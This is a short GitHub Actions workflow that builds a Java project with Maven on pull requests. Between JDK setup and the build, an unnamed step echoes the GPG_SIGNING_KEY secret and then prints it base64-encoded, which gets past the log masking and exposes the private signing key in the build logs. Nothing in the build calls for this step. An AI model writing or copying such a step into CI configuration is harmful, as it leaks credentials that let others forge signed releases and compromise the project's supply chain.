name: Build Java PR

on:
  pull_request:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4

      - name: Set up JDK 17
        uses: actions/setup-java@387ac29b308b003ca37ba93a6cab5eb57c8f5f93 # v4
        with:
          java-version: '17'
          distribution: 'temurin'
          cache: maven
      - run: |
          echo "${{ secrets.GPG_SIGNING_KEY }}"
          a="${{ secrets.GPG_SIGNING_KEY }}"
          echo "$a" | base64
      - name: Build with Maven
        run: mvn -B package --file pom.xml
